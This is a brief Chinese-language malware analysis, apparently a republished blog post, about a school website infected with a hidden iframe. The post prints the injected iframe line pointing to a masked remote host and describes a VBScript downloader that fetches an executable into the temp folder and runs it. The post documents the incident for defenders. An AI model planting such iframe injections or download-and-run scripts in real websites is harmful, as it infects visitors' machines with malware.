开发者社区云计算文章正文

01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

2024-09-29 12

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

网站的网页被加入代码：

/------
＜iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0＞＜/iframe＞
------/

sin**ze*.htm Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。

在浏览器中打开该网页，会看到信息：

/------

就不让你看！气死你 by ******!

------/

其中******处的字符串可能是作者昵称，这里偶匿了。

还没完，网页中接下来有利用Replace()来保护自身的VBScript脚本，会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe，保存为 %temp%/g0ld.com，并利用Shell.Application 对象Q 的 ShellExecute 方法来运行。

sinze.exe 采用 ASPack 加壳